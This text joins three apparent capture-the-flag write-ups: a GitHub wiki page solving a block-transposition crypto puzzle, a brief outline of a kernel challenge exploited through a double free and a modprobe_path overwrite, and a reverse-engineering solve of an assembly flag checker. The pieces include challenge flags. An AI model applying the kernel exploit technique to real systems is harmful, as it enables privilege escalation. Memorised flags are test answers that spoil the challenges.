3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Easy Crypto Challenge</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Easy-Crypto-Challenge/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Information Paradox</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Information-Paradox/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Invisible Stargate</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Invisible-Stargate/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Off The Grid</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Off-The-Grid/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Strange Traffic</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Strange-Traffic/_toc"> </include-fragment></details> </div></div> </div> <h5 class="mt-0 mb-2">Clone this wiki locally</h5> <div class="width-full input-group"> <input id="wiki-clone-url" type="text" data-autoselect class="form-control input-sm text-small color-fg-muted input-monospace" aria-label="Clone URL for this wiki" value="https://github.com/not1cyyy/CTF-Writeups.wiki.git" readonly> <span> <clipboard-copy for="wiki-clone-url" aria-label="Copy to clipboard" data-view-component="true" class="btn btn-sm zeroclipboard-button"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg style="display: none;" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check color-fg-success"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg></clipboard-copy> </span> </div> </div></div> <div data-view-component="true" class="Layout-main"> <div id="wiki-body" class="gollum-markdown-content"> <div class="markdown-body"> <h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Description</h1>Our data got corrupted on the way here. Luckily, nothing got replaced, but every block of 3 got scrambled around! The first word seems to be three letters long, maybe you can use that to recover the rest of the message. Download the corrupted message here.Hint : Split the message up into blocks of 3 and see how the first block is scrambled<h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Files</h2>message.txt<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="heTfl g as iicpCTo{7F4NRP051N5_16_35P3X51N3_VCDE4CE4}7">heTfl g as iicpCTo{7F4NRP051N5_16_35P3X51N3_VCDE4CE4}7</div><h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Solution</h1><h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Recon</h2>At first glance this is just some scrambled text in a 3 letters sequencePython would be really useful for us !<h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Execution</h2>First thing is that we have to split our scrambled flag into blocks of 3 letters each so in python it would be :<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="from textwrap import wrap Our data got corrupted on the way here. Luckily, nothing got replaced, but every block of 3 got scrambled around! The first word seems to be three letters long, maybe you can use that to recover the rest of the message. Download the corrupted message here. Hint : Split the message up into blocks of 3 and see how the first block is scrambled First thing is that we have to split our scrambled flag into blocks of 3 letters each so in python it would be : s='heTflgasiicpCTo{7F4NRP051N5_16_35P3X51N3_VCDE4CE4}7'print(wrap(s,3))">from textwrap import wrap s='heTflgasiicpCTo{7F4NRP051N5_16_35P3X51N3_VCDE4CE4}7'print(wrap(s,3))</div>and it generated this output :<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="['heT', 'flg', 'asi', 'icp', 'CTo', '{7F', '4NR', 'P05', '1N5', '_16', '_35', 'P3X', '51N', '3_V', 'CDE', '4CE', '4}7']">['heT', 'flg', 'asi', 'icp', 'CTo', '{7F', '4NR', 'P05', '1N5', '_16', '_35', 'P3X', '51N', '3_V', 'CDE', '4CE', '4}7']</div>The first word should be "The" so the first character is just moved to the last position in each blockI went ahead and saved this output in a file and called it stringsplit.txt to strip it, then I opened it in python and looped over each line and ordered the characters according to the correct pattern :<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="dictionary = open("stringsplit.txt", "r") and it generated this output : The first word should be "The" so the first character is just moved to the last position in each block I went ahead and saved this output in a file and called it stringsplit.txt to strip it, then I opened it in python and looped over each line and ordered the characters according to the correct pattern : for i in dictionary: print((i[2]+i[0]+i[1]).strip())">dictionary = open("stringsplit.txt", "r") for i in dictionary: print((i[2]+i[0]+i[1]).strip())</div>and it generated this output :<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="ThegfliaspicoCTF{7R4N5P051N6_15_3XP3N51V3_ECDE4C74}">ThegfliaspicoCTF{7R4N5P051N6_15_3XP3N51V3_ECDE4C74}</div>I also saved this to a file named organised.txt to make things easy for me to work withNow for the final step I just joined the blocks together using :<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="organised = open("organised.txt", "r")flag = ''for j in organised: flag = flag+j.strip()print(flag)">organised = open("organised.txt", "r")flag = ''for j in organised: flag = flag+j.strip()print(flag)</div>and it resulted in this output :<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="ThegfliaspicoCTF{7R4N5P051N6_15_3XP3N51V3_ECDE4C74}">ThegfliaspicoCTF{7R4N5P051N6_15_3XP3N51V3_ECDE4C74}</div>And voila!<h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Flag</h1>picoCTF{7R4N5P051N6_15_3XP3N51V3_ECDE4C74} and it generated this output : I also saved this to a file named organised.txt to make things easy for me to work with Now for the final step I just joined the blocks together using : and it resulted in this output : And voila! picoCTF{7R4N5P051N6_15_3XP3N51V3_ECDE4C74} </div> </div></div></div> </div> </div> </div> </turbo-frame> </main> </div> </div> <footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2> <div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div> <nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div> <div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template> </div> <div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
qKarachter was a kernel challenge, which provided a misc device that can be interacted with ioctl(2). In summary: * uint8 overflow when assigning readPos[idx] @ readData* readPos[idx] is still set even when copy_to_user failed and read pointer didn't get incremented @ readData* free next adjacent chunk when read pointer == max buffer pointer and readPos[idx] == 0, which can be turned into double free* overwrite fd to get an allocation on modprobe_path, overwrite modprobe_path to do modprobe_path exploit Full writeup can be found here [https://circleous.blogspot.com/2022/04/crewctf-2022-qkarachter.html](https://circleous.blogspot.com/2022/04/crewctf-2022-qkarachter.html)
REDo2 ended up being worth 152 points in the Reverse Engineering category in TAMU CTF 2022! ![alt text](https://github.com/Ale0x78/Ale0x78.github.io/raw/main/static/img/REdo2.png "Challenge Description: Honestly, this is just a plain and simple ASM challenge. Best of luck.") ## Step 1: I much rather read Pseudo-C I can read assembly and have in the past when my disassemblers have lost track of what is happening or if I am in gdb, but I’ve been spoiled by [Binary Ninja](https://binary.ninja/) and [Ghidra](https://ghidra-sre.org/) so why not just assemble the code ? If you run```gcc -g -m32 -c redo2.s -o redo2```The assembler throws a bunch of error messages because the gnu assembler [GAS]() expected At&t Syntax, so we switch it to intel by adding the `.intel_syntax noprefix` line at the top of the file! Compiling and running it through Binary Ninja, we get:```void* const var_4 = __return_addrint32_t* var_10 = &arg1int32_t eax_1if (arg1 != 2) eax_1 = 1else void* var_14_1 = nullptr while (true) if (var_14_1 s> 0x1c) char* eax_7 = malloc(0x1d) for (void* var_18_1 = nullptr; var_18_1 s<= 0x1c; var_18_1 = var_18_1 + 1) *(eax_7 + var_18_1) = *(var_18_1 + *(arg2 + 4)) *(eax_7 + var_18_1) = *(eax_7 + var_18_1) - 0x31 if (*eax_7 != eax_7[2]) eax_1 = 1 else if (eax_7[1] != 0x38) eax_1 = 1 else if (*eax_7 != 0x36) eax_1 = 1 else if (eax_7[3] != 0x34) eax_1 = 1 else if (sx.d(eax_7[0x1c]) != sx.d(eax_7[5]) + 2) eax_1 = 1 else if (eax_7[5] != 0x4a) eax_1 = 1 else if (eax_7[4] != 0x3c) eax_1 = 1 else int32_t var_1c_1 = 0 while (true) if (var_1c_1 s> 2) int32_t var_20_1 = 0 while (true) if (var_20_1 s> 3) int32_t var_24_1 = 0 while (true) if (var_24_1 s> 4) if (sx.d(eax_7[0x15]) != sx.d(eax_7[0xf]) + 1) eax_1 = 1 else if (eax_7[9] != eax_7[0xe]) eax_1 = 1 else if (eax_7[9] != eax_7[0x14]) eax_1 = 1 else if (eax_7[9] != eax_7[0x16]) eax_1 = 1 else if (eax_7[9] != 0x2e) eax_1 = 1 else if (eax_7[0x1b] != 1) eax_1 = 1 else if (eax_7[0x1a] != 2) eax_1 = 1 else if (eax_7[0x17] != 3) eax_1 = 1 else if (eax_7[0x18] == 4) eax_1 = sx.d(eax_7[0x19]) else eax_1 = 1 break if (eax_7[var_24_1 + 0xf] != 0x32) eax_1 = 1 break var_24_1 = var_24_1 + 1 break if (eax_7[var_20_1 + 0xa] != 0x31) eax_1 = 1 break var_20_1 = var_20_1 + 1 break if (eax_7[var_1c_1 + 6] != 0x30) eax_1 = 1 break var_1c_1 = var_1c_1 + 1 break if (*(var_14_1 + *(arg2 + 4)) == 0) eax_1 = 1 break var_14_1 = var_14_1 + 1return eax_1```Let’s start with this for loop that gives 2 significant things away, the size of our buffer is `0x1c`, and every character is shifted down by `0x31`. At the time I had 0 clue what the `*(eax_7 + var_18_1) = *(var_18_1 + *(arg2 + 4))` line is all about, but it didn’t seem to be relevant. ```for (void* var_18_1 = nullptr; var_18_1 s<= 0x1c; var_18_1 = var_18_1 + 1) *(eax_7 + var_18_1) = *(var_18_1 + *(arg2 + 4)) *(eax_7 + var_18_1) = *(eax_7 + var_18_1) - 0x31```Now, it’s clear that EAX_7 is our flag buffer, so I Command-F `!=` and replaced it with `=` and then copied all of the conditions to a python file and made the index being checked equal to the value being checked against. ```pythonflag = [0]*39 flag[0x1] = 0x38flag[0x0] = 0x36flag[0x3] = 0x34flag[0x5] = 0x4aflag[0x2] = flag[0] flag[28] = flag[0x5] + 2flag[0x4] = 0x3cflag[0x15] = flag[0xf] + 1flag[9] = 0x2eflag[0xe] = flag[0x9]flag[0x14] = flag[0x9]flag[0x16] = flag[0x9]flag[0x1b] = 1flag[0x1a] = 2flag[0x17] = 3flag[0x18] = 4 # Trickyflag[0x19] = 0 # Tricky````0x19` is tricky because it’s actually set as the return status, assuming the return status is supposed to be 0 (pretty sure the assembler might have done this). Also, I had to move the order of `0xe`, `0x14`, and `0x16` around after `0x09` was defined. Now the only thing is the while loops which are translated to python, look like this: ```pythonfor o in range(0, 3): for k in range(0,4): for j in range(0,5): flag[j + 0xf] = 0x32 flag[k + 0xa] = 0x31 flag[o + 0x6] = 0x30```So all together along with our shift by `0x31`, the `solve.py` looks like this:```flag = [0]*39 flag[0x1] = 0x38flag[0x0] = 0x36flag[0x3] = 0x34flag[0x5] = 0x4aflag[0x2] = flag[0] flag[28] = flag[0x5] + 2flag[0x4] = 0x3c for o in range(0, 3): for k in range(0,4): for j in range(0,5): flag[j + 0xf] = 0x32 flag[k + 0xa] = 0x31 flag[o + 0x6] = 0x30 flag[0x15] = flag[0xf] + 1flag[9] = 0x2eflag[0xe] = flag[0x9]flag[0x14] = flag[0x9]flag[0x16] = flag[0x9]flag[0x1b] = 1flag[0x1a] = 2flag[0x17] = 3flag[0x18] = 4 # Trickyflag[0x19] = 0 # Tricky # Decode for i in range(0, 39): # flag[i] += i flag[i] += 0x31 print(''.join(list(map(lambda x: chr(x), flag))))```After running the solver, it looks like the flag was shorter than the buffer, but we can ignore the `1`’s in the end and submit the `gigem{aaa_bbbb_ccccc_d_45132}`.```╭─alex at Howl in ⌁/Fold/TAMU22/redo2╰─λ python3 solve.pygigem{aaa_bbbb_ccccc_d_45132}1111111111╭─alex at Howl in ⌁/Fold/TAMU22/redo2╰─λ ```
